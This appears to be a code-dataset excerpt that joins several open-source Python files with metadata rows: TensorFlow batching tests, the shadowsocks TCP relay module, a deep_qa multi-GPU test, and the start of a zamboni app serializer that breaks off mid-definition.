self.assertEqual(len(results[2]), 2 * extra_elements)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].indices,
np.vstack((np.arange(2 * extra_elements),
np.zeros(2 * extra_elements))).T)
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), 2 * extra_elements)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
# Some minimum level of mixing of the results of both threads.
self.assertGreater(saw_both, 1)
# Saw all the items from "a", but scrambled, including extras.
self.assertItemsEqual(all_a, range(num_a))
deltas = [all_a[i + 1] - all_a[i] for i in range(len(all_a) - 1)]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testMismatchedDictKeys(self):
with self.assertRaisesRegexp(ValueError, "must have the same keys"):
inp.shuffle_batch_join(
[{
"c": 12,
"s": 123,
"S": "a"
}, {
"cool": -12,
"s": 99,
"S": "b"
}],
batch_size=8,
capacity=32,
min_after_dequeue=16,
seed=223607)
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.shuffle_batch_join(
[[counter, "string"]],
batch_size=batch_size,
capacity=32,
min_after_dequeue=10,
shared_name="SHARED_NAME_XYZ",
name="Q")
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((batch_size,), batched[0].get_shape().as_list())
self.assertAllEqual((batch_size,), batched[1].get_shape().as_list())
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_shuffle_batch_join(
[to_batch] * num_threads,
batch_size,
10,
1,
keep_input,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual([0] * batch_size, np.mod(results[0], 2))
self.assertAllEqual([0] * batch_size, np.mod(results[1].values, 2))
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testSingleThreadKeepInputPerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadKeepInputPerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_shuffle_batch_join(
[[array_ops.zeros(5)]], 1, 10, 1,
keep_input=constant_op.constant([True, False]),
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_shuffle_batch_join(
[[array_ops.zeros(5)]], 1, 10, 1,
keep_input=constant_op.constant([[True]]),
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_shuffle_batch_join(
[[array_ops.zeros(5)]], 1, 10, 1,
keep_input=array_ops.placeholder(dtypes.bool),
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch_join([[sparse]], 2, 10, 1, True)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, True, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, [True, False], enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch_join([[sparse]], 2, 10, 1, True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, True, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch_join(
[[sparse]], 2, 10, 1, [True, False], enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
if __name__ == "__main__":
test_lib.main()
| apache-2.0 | 1,367,426,583,450,489,900 | 39.769697 | 80 | 0.622927 | false |
richard-chen-1985/shadowsocks | shadowsocks/tcprelay.py | 2 | 28752 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import time
import socket
import errno
import struct
import logging
import traceback
import random
from shadowsocks import encrypt, eventloop, utils, common
from shadowsocks.common import parse_header
# we clear at most TIMEOUTS_CLEAN_SIZE timeouts each time
TIMEOUTS_CLEAN_SIZE = 512
# we check timeouts every TIMEOUT_PRECISION seconds
TIMEOUT_PRECISION = 4
MSG_FASTOPEN = 0x20000000
# SOCKS command definitions
CMD_CONNECT = 1
CMD_BIND = 2
CMD_UDP_ASSOCIATE = 3
# TCP Relay can be either sslocal or ssserver
# for sslocal it is created with is_local=True
# for each opening port, we have a TCP Relay
# for each connection, we have a TCP Relay Handler to handle the connection
# for each handler, we have 2 sockets:
# local: connected to the client
# remote: connected to remote server
# for each handler, we have 2 streams:
# upstream: from client to server direction
# read local and write to remote
# downstream: from server to client direction
# read remote and write to local
# for each handler, it could be at one of several stages:
# sslocal:
# stage 0 SOCKS hello received from local, send hello to local
# stage 1 addr received from local, query DNS for remote
# stage 2 UDP assoc
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
# ssserver:
# stage 0 just jump to stage 1
# stage 1 addr received from local, query DNS for remote
# stage 3 DNS resolved, connect to remote
# stage 4 still connecting, more data from local received
# stage 5 remote connected, piping local and remote
STAGE_INIT = 0
STAGE_ADDR = 1
STAGE_UDP_ASSOC = 2
STAGE_DNS = 3
STAGE_CONNECTING = 4
STAGE_STREAM = 5
STAGE_DESTROYED = -1
# stream direction
STREAM_UP = 0
STREAM_DOWN = 1
# stream wait status, indicating it's waiting for reading, etc
WAIT_STATUS_INIT = 0
WAIT_STATUS_READING = 1
WAIT_STATUS_WRITING = 2
WAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING
BUF_SIZE = 32 * 1024
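# --- Illustrative sketch (not part of the original module) -------------------
# _update_stream() below maps the two stream wait statuses onto poll events
# for each socket: the local socket is polled for reading while the upstream
# wants to read and for writing while the downstream wants to write; the
# remote socket is the mirror image.  This standalone helper only restates
# that mapping for clarity; its name is an assumption for illustration and it
# is not used by the relay itself.
def _example_poll_events(upstream_status, downstream_status):
    """Return (local_events, remote_events) for the given stream statuses."""
    local_events = remote_events = eventloop.POLL_ERR
    if downstream_status & WAIT_STATUS_WRITING:
        local_events |= eventloop.POLL_OUT
    if upstream_status & WAIT_STATUS_READING:
        local_events |= eventloop.POLL_IN
    if downstream_status & WAIT_STATUS_READING:
        remote_events |= eventloop.POLL_IN
    if upstream_status & WAIT_STATUS_WRITING:
        remote_events |= eventloop.POLL_OUT
    return local_events, remote_events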
class TCPRelayHandler(object):
def __init__(self, server, fd_to_handlers, loop, local_sock, config,
dns_resolver, is_local):
self._server = server
self._fd_to_handlers = fd_to_handlers
self._loop = loop
self._local_sock = local_sock
self._remote_sock = None
self._config = config
self._dns_resolver = dns_resolver
self._is_local = is_local
self._stage = STAGE_INIT
self._encryptor = encrypt.Encryptor(config['password'],
config['method'])
self._fastopen_connected = False
self._data_to_write_to_local = []
self._data_to_write_to_remote = []
self._upstream_status = WAIT_STATUS_READING
self._downstream_status = WAIT_STATUS_INIT
self._client_address = local_sock.getpeername()[:2]
self._remote_address = None
if is_local:
self._chosen_server = self._get_a_server()
fd_to_handlers[local_sock.fileno()] = self
local_sock.setblocking(False)
local_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
loop.add(local_sock, eventloop.POLL_IN | eventloop.POLL_ERR)
self.last_activity = 0
self._update_activity()
def __hash__(self):
# default __hash__ is id / 16
# we want to eliminate collisions
return id(self)
@property
def remote_address(self):
return self._remote_address
def _get_a_server(self):
server = self._config['server']
server_port = self._config['server_port']
if type(server_port) == list:
server_port = random.choice(server_port)
logging.debug('chosen server: %s:%d', server, server_port)
# TODO support multiple server IP
return server, server_port
def _update_activity(self):
# tell the TCP Relay we have activities recently
# else it will think we are inactive and timed out
self._server.update_activity(self)
def _update_stream(self, stream, status):
# update a stream to a new waiting status
# check if status is changed
# only update if dirty
dirty = False
if stream == STREAM_DOWN:
if self._downstream_status != status:
self._downstream_status = status
dirty = True
elif stream == STREAM_UP:
if self._upstream_status != status:
self._upstream_status = status
dirty = True
if dirty:
if self._local_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
if self._upstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
self._loop.modify(self._local_sock, event)
if self._remote_sock:
event = eventloop.POLL_ERR
if self._downstream_status & WAIT_STATUS_READING:
event |= eventloop.POLL_IN
if self._upstream_status & WAIT_STATUS_WRITING:
event |= eventloop.POLL_OUT
self._loop.modify(self._remote_sock, event)
def _write_to_sock(self, data, sock):
# write data to sock
# if only some of the data are written, put remaining in the buffer
# and update the stream to wait for writing
if not data or not sock:
return False
uncomplete = False
try:
l = len(data)
s = sock.send(data)
if s < l:
data = data[s:]
uncomplete = True
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
uncomplete = True
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
return False
if uncomplete:
if sock == self._local_sock:
self._data_to_write_to_local.append(data)
self._update_stream(STREAM_DOWN, WAIT_STATUS_WRITING)
elif sock == self._remote_sock:
self._data_to_write_to_remote.append(data)
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
else:
logging.error('write_all_to_sock:unknown socket')
else:
if sock == self._local_sock:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
elif sock == self._remote_sock:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
else:
logging.error('write_all_to_sock:unknown socket')
return True
def _handle_stage_connecting(self, data):
if self._is_local:
data = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data)
if self._is_local and not self._fastopen_connected and \
self._config['fast_open']:
# for sslocal and fastopen, we basically wait for data and use
# sendto to connect
try:
# only connect once
self._fastopen_connected = True
remote_sock = \
self._create_remote_socket(self._chosen_server[0],
self._chosen_server[1])
self._loop.add(remote_sock, eventloop.POLL_ERR)
data = b''.join(self._data_to_write_to_remote)
l = len(data)
s = remote_sock.sendto(data, MSG_FASTOPEN, self._chosen_server)
if s < l:
data = data[s:]
self._data_to_write_to_remote = [data]
else:
self._data_to_write_to_remote = []
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == errno.EINPROGRESS:
# in this case data is not sent at all
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
elif eventloop.errno_from_exception(e) == errno.ENOTCONN:
logging.error('fast open not supported on this OS')
self._config['fast_open'] = False
self.destroy()
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _handle_stage_addr(self, data):
try:
if self._is_local:
cmd = common.ord(data[1])
if cmd == CMD_UDP_ASSOCIATE:
logging.debug('UDP associate')
if self._local_sock.family == socket.AF_INET6:
header = b'\x05\x00\x00\x04'
else:
header = b'\x05\x00\x00\x01'
addr, port = self._local_sock.getsockname()[:2]
addr_to_send = socket.inet_pton(self._local_sock.family,
addr)
port_to_send = struct.pack('>H', port)
self._write_to_sock(header + addr_to_send + port_to_send,
self._local_sock)
self._stage = STAGE_UDP_ASSOC
# just wait for the client to disconnect
return
elif cmd == CMD_CONNECT:
# just trim VER CMD RSV
data = data[3:]
else:
logging.error('unknown command %d', cmd)
self.destroy()
return
header_result = parse_header(data)
if header_result is None:
raise Exception('can not parse header')
addrtype, remote_addr, remote_port, header_length = header_result
logging.info('connecting %s:%d from %s:%d' %
(common.to_str(remote_addr), remote_port,
self._client_address[0], self._client_address[1]))
self._remote_address = (remote_addr, remote_port)
# pause reading
self._update_stream(STREAM_UP, WAIT_STATUS_WRITING)
self._stage = STAGE_DNS
if self._is_local:
# forward address to remote
self._write_to_sock((b'\x05\x00\x00\x01'
b'\x00\x00\x00\x00\x10\x10'),
self._local_sock)
data_to_send = self._encryptor.encrypt(data)
self._data_to_write_to_remote.append(data_to_send)
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(self._chosen_server[0],
self._handle_dns_resolved)
else:
if len(data) > header_length:
self._data_to_write_to_remote.append(data[header_length:])
# notice here may go into _handle_dns_resolved directly
self._dns_resolver.resolve(remote_addr,
self._handle_dns_resolved)
except Exception as e:
self._log_error(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _create_remote_socket(self, ip, port):
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM,
socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
af, socktype, proto, canonname, sa = addrs[0]
remote_sock = socket.socket(af, socktype, proto)
self._remote_sock = remote_sock
self._fd_to_handlers[remote_sock.fileno()] = self
remote_sock.setblocking(False)
remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
return remote_sock
def _handle_dns_resolved(self, result, error):
if error:
self._log_error(error)
self.destroy()
return
if result:
ip = result[1]
if ip:
try:
self._stage = STAGE_CONNECTING
remote_addr = ip
if self._is_local:
remote_port = self._chosen_server[1]
else:
remote_port = self._remote_address[1]
if self._is_local and self._config['fast_open']:
# for fastopen:
# wait for more data to arrive and send them in one SYN
self._stage = STAGE_CONNECTING
# we don't have to wait for remote since it's not
# created
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
# TODO when there is already data in this packet
else:
# else do connect
remote_sock = self._create_remote_socket(remote_addr,
remote_port)
try:
remote_sock.connect((remote_addr, remote_port))
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) == \
errno.EINPROGRESS:
pass
self._loop.add(remote_sock,
eventloop.POLL_ERR | eventloop.POLL_OUT)
self._stage = STAGE_CONNECTING
self._update_stream(STREAM_UP, WAIT_STATUS_READWRITING)
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
return
except (OSError, IOError) as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
self.destroy()
def _on_local_read(self):
# handle all local read events and dispatch them to methods for
# each stage
self._update_activity()
if not self._local_sock:
return
is_local = self._is_local
data = None
try:
data = self._local_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
if not is_local:
data = self._encryptor.decrypt(data)
if not data:
return
if self._stage == STAGE_STREAM:
if self._is_local:
data = self._encryptor.encrypt(data)
self._write_to_sock(data, self._remote_sock)
return
elif is_local and self._stage == STAGE_INIT:
# TODO check auth method
self._write_to_sock(b'\x05\00', self._local_sock)
self._stage = STAGE_ADDR
return
elif self._stage == STAGE_CONNECTING:
self._handle_stage_connecting(data)
elif (is_local and self._stage == STAGE_ADDR) or \
(not is_local and self._stage == STAGE_INIT):
self._handle_stage_addr(data)
def _on_remote_read(self):
# handle all remote read events
self._update_activity()
data = None
try:
data = self._remote_sock.recv(BUF_SIZE)
except (OSError, IOError) as e:
if eventloop.errno_from_exception(e) in \
(errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
return
if not data:
self.destroy()
return
if self._is_local:
data = self._encryptor.decrypt(data)
else:
data = self._encryptor.encrypt(data)
try:
self._write_to_sock(data, self._local_sock)
except Exception as e:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
# TODO use logging when debug completed
self.destroy()
def _on_local_write(self):
# handle local writable event
if self._data_to_write_to_local:
data = b''.join(self._data_to_write_to_local)
self._data_to_write_to_local = []
self._write_to_sock(data, self._local_sock)
else:
self._update_stream(STREAM_DOWN, WAIT_STATUS_READING)
def _on_remote_write(self):
# handle remote writable event
self._stage = STAGE_STREAM
if self._data_to_write_to_remote:
data = b''.join(self._data_to_write_to_remote)
self._data_to_write_to_remote = []
self._write_to_sock(data, self._remote_sock)
else:
self._update_stream(STREAM_UP, WAIT_STATUS_READING)
def _on_local_error(self):
logging.debug('got local error')
if self._local_sock:
logging.error(eventloop.get_sock_error(self._local_sock))
self.destroy()
def _on_remote_error(self):
logging.debug('got remote error')
if self._remote_sock:
logging.error(eventloop.get_sock_error(self._remote_sock))
self.destroy()
def handle_event(self, sock, event):
# handle all events in this handler and dispatch them to methods
if self._stage == STAGE_DESTROYED:
logging.debug('ignore handle_event: destroyed')
return
# order is important
if sock == self._remote_sock:
if event & eventloop.POLL_ERR:
self._on_remote_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_remote_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_remote_write()
elif sock == self._local_sock:
if event & eventloop.POLL_ERR:
self._on_local_error()
if self._stage == STAGE_DESTROYED:
return
if event & (eventloop.POLL_IN | eventloop.POLL_HUP):
self._on_local_read()
if self._stage == STAGE_DESTROYED:
return
if event & eventloop.POLL_OUT:
self._on_local_write()
else:
logging.warn('unknown socket')
def _log_error(self, e):
logging.error('%s when handling connection from %s:%d' %
(e, self._client_address[0], self._client_address[1]))
def destroy(self):
# destroy the handler and release any resources
# promises:
# 1. destroy won't make another destroy() call inside
# 2. destroy releases resources so it prevents future call to destroy
# 3. destroy won't raise any exceptions
# if any of the promises are broken, it indicates a bug has been
        # introduced! most likely memory leaks, etc.
if self._stage == STAGE_DESTROYED:
# this couldn't happen
logging.debug('already destroyed')
return
self._stage = STAGE_DESTROYED
if self._remote_address:
logging.debug('destroy: %s:%d' %
self._remote_address)
else:
logging.debug('destroy')
if self._remote_sock:
logging.debug('destroying remote')
self._loop.remove(self._remote_sock)
del self._fd_to_handlers[self._remote_sock.fileno()]
self._remote_sock.close()
self._remote_sock = None
if self._local_sock:
logging.debug('destroying local')
self._loop.remove(self._local_sock)
del self._fd_to_handlers[self._local_sock.fileno()]
self._local_sock.close()
self._local_sock = None
self._dns_resolver.remove_callback(self._handle_dns_resolved)
self._server.remove_handler(self)
class TCPRelay(object):
def __init__(self, config, dns_resolver, is_local):
self._config = config
self._is_local = is_local
self._dns_resolver = dns_resolver
self._closed = False
self._eventloop = None
self._fd_to_handlers = {}
self._last_time = time.time()
self._timeout = config['timeout']
self._timeouts = [] # a list for all the handlers
        # we trim the timeouts once in a while
self._timeout_offset = 0 # last checked position for timeout
self._handler_to_timeouts = {} # key: handler value: index in timeouts
if is_local:
listen_addr = config['local_address']
listen_port = config['local_port']
else:
listen_addr = config['server']
listen_port = config['server_port']
self._listen_port = listen_port
addrs = socket.getaddrinfo(listen_addr, listen_port, 0,
socket.SOCK_STREAM, socket.SOL_TCP)
if len(addrs) == 0:
raise Exception("can't get addrinfo for %s:%d" %
(listen_addr, listen_port))
af, socktype, proto, canonname, sa = addrs[0]
server_socket = socket.socket(af, socktype, proto)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(sa)
server_socket.setblocking(False)
if config['fast_open']:
try:
server_socket.setsockopt(socket.SOL_TCP, 23, 5)
except socket.error:
logging.error('warning: fast open is not available')
self._config['fast_open'] = False
server_socket.listen(1024)
self._server_socket = server_socket
def add_to_loop(self, loop):
if self._eventloop:
raise Exception('already add to loop')
if self._closed:
raise Exception('already closed')
self._eventloop = loop
loop.add_handler(self._handle_events)
self._eventloop.add(self._server_socket,
eventloop.POLL_IN | eventloop.POLL_ERR)
def remove_handler(self, handler):
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
del self._handler_to_timeouts[hash(handler)]
def update_activity(self, handler):
# set handler to active
now = int(time.time())
if now - handler.last_activity < TIMEOUT_PRECISION:
# thus we can lower timeout modification frequency
return
handler.last_activity = now
index = self._handler_to_timeouts.get(hash(handler), -1)
if index >= 0:
# delete is O(n), so we just set it to None
self._timeouts[index] = None
length = len(self._timeouts)
self._timeouts.append(handler)
self._handler_to_timeouts[hash(handler)] = length
def _sweep_timeout(self):
# tornado's timeout memory management is more flexible than we need
# we just need a sorted last_activity queue and it's faster than heapq
# in fact we can do O(1) insertion/remove so we invent our own
if self._timeouts:
logging.log(utils.VERBOSE_LEVEL, 'sweeping timeouts')
now = time.time()
length = len(self._timeouts)
pos = self._timeout_offset
while pos < length:
handler = self._timeouts[pos]
if handler:
if now - handler.last_activity < self._timeout:
break
else:
if handler.remote_address:
logging.warn('timed out: %s:%d' %
handler.remote_address)
else:
logging.warn('timed out')
handler.destroy()
self._timeouts[pos] = None # free memory
pos += 1
else:
pos += 1
if pos > TIMEOUTS_CLEAN_SIZE and pos > length >> 1:
                    # compact the timeout queue once the swept prefix grows
                    # larger than half of the queue
self._timeouts = self._timeouts[pos:]
for key in self._handler_to_timeouts:
self._handler_to_timeouts[key] -= pos
pos = 0
self._timeout_offset = pos
def _handle_events(self, events):
# handle events and dispatch to handlers
for sock, fd, event in events:
if sock:
logging.log(utils.VERBOSE_LEVEL, 'fd %d %s', fd,
eventloop.EVENT_NAMES.get(event, event))
if sock == self._server_socket:
if event & eventloop.POLL_ERR:
# TODO
raise Exception('server_socket error')
try:
logging.debug('accept')
conn = self._server_socket.accept()
TCPRelayHandler(self, self._fd_to_handlers,
self._eventloop, conn[0], self._config,
self._dns_resolver, self._is_local)
except (OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
continue
else:
logging.error(e)
if self._config['verbose']:
traceback.print_exc()
else:
if sock:
handler = self._fd_to_handlers.get(fd, None)
if handler:
handler.handle_event(sock, event)
else:
logging.warn('poll removed fd')
now = time.time()
if now - self._last_time > TIMEOUT_PRECISION:
self._sweep_timeout()
self._last_time = now
if self._closed:
if self._server_socket:
self._eventloop.remove(self._server_socket)
self._server_socket.close()
self._server_socket = None
logging.info('closed listen port %d', self._listen_port)
if not self._fd_to_handlers:
self._eventloop.remove_handler(self._handle_events)
def close(self, next_tick=False):
self._closed = True
if not next_tick:
self._server_socket.close()
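# --- Illustrative sketch (not part of the original module) -------------------
# TCPRelay.update_activity()/_sweep_timeout() above keep an activity queue
# with O(1) insert and O(1) logical removal: handlers are appended in
# last-activity order, stale slots are tombstoned with None instead of being
# deleted, and the swept prefix is sliced off periodically.  The minimal
# standalone class below restates that pattern (it compacts on every sweep
# for brevity); its name and methods are assumptions for illustration only.
class _ExampleActivityQueue(object):
    def __init__(self):
        self._entries = []   # (key, last_activity) in activity order, or None
        self._index = {}     # key -> position in self._entries
    def touch(self, key, now):
        old_pos = self._index.pop(key, -1)
        if old_pos >= 0:
            self._entries[old_pos] = None   # tombstone; a real delete is O(n)
        self._index[key] = len(self._entries)
        self._entries.append((key, now))
    def sweep(self, now, timeout):
        expired = []
        pos = 0
        while pos < len(self._entries):
            entry = self._entries[pos]
            if entry is not None:
                key, last_activity = entry
                if now - last_activity < timeout:
                    break                   # everything after this is newer
                expired.append(key)
                del self._index[key]
            pos += 1
        self._entries = self._entries[pos:]
        for key in self._index:
            self._index[key] -= pos
        return expired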
| mit | 1,526,666,457,885,069,600 | 39.552891 | 79 | 0.53805 | false |
allenai/deep_qa | tests/training/multi_gpu_test.py | 2 | 1929 | # pylint: disable=no-self-use,invalid-name
from copy import deepcopy
import keras.backend as K
from deep_qa.common.params import Params
from deep_qa.models.text_classification import ClassificationModel
from deep_qa.testing.test_case import DeepQaTestCase
class TestMultiGpu(DeepQaTestCase):
def setUp(self):
super(TestMultiGpu, self).setUp()
self.write_true_false_model_files()
self.args = Params({
'num_gpus': 2,
})
def test_model_can_train_and_load(self):
self.ensure_model_trains_and_loads(ClassificationModel, self.args)
def test_model_can_train_and_load_with_generator(self):
args = self.args
args["data_generator"] = {"dynamic_batching": True, "padding_noise": 0.4}
self.ensure_model_trains_and_loads(ClassificationModel, args)
def test_variables_live_on_cpu(self):
model = self.get_model(ClassificationModel, self.args)
model.train()
trainable_variables = model.model.trainable_weights
for variable in trainable_variables:
# This is an odd quirk of tensorflow - the devices are actually named
            # slightly differently from their scopes ... (i.e. != "/cpu:0")
assert variable.device == "/cpu:0" or variable.device == ""
def test_multi_gpu_shares_variables(self):
multi_gpu_model = self.get_model(ClassificationModel, self.args)
single_gpu_args = deepcopy(self.args)
single_gpu_args["num_gpus"] = 1
single_gpu_model = self.get_model(ClassificationModel, single_gpu_args)
multi_gpu_model.train()
multi_gpu_variables = [x.name for x in multi_gpu_model.model.trainable_weights]
K.clear_session()
single_gpu_model.train()
single_gpu_variables = ["tower_0/" + x.name for x in single_gpu_model.model.trainable_weights]
assert single_gpu_variables == multi_gpu_variables
| apache-2.0 | -7,753,536,033,354,599,000 | 36.096154 | 102 | 0.667185 | false |
elysium001/zamboni | mkt/fireplace/serializers.py | 7 | 3426 | from django.template.defaultfilters import filesizeformat
from rest_framework import serializers
from mkt.webapps.serializers import SimpleAppSerializer, SimpleESAppSerializer
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer
class BaseFireplaceAppSerializer(object):
def get_icons(self, app):
# Fireplace only requires 64px and 128px icons.
return {
64: app.get_icon_url(64),
128: app.get_icon_url(128)
}
# We don't care about the integer value of the file size in fireplace, we
# just want to display it to the user in a human-readable way.
def transform_file_size(self, obj, value):
if value:
return filesizeformat(value)
return None
class FireplaceAppSerializer(BaseFireplaceAppSerializer, SimpleAppSerializer):
class Meta(SimpleAppSerializer.Meta):
fields = ['author', 'banner_message', 'banner_regions', 'categories',
'content_ratings', 'current_version', 'description',
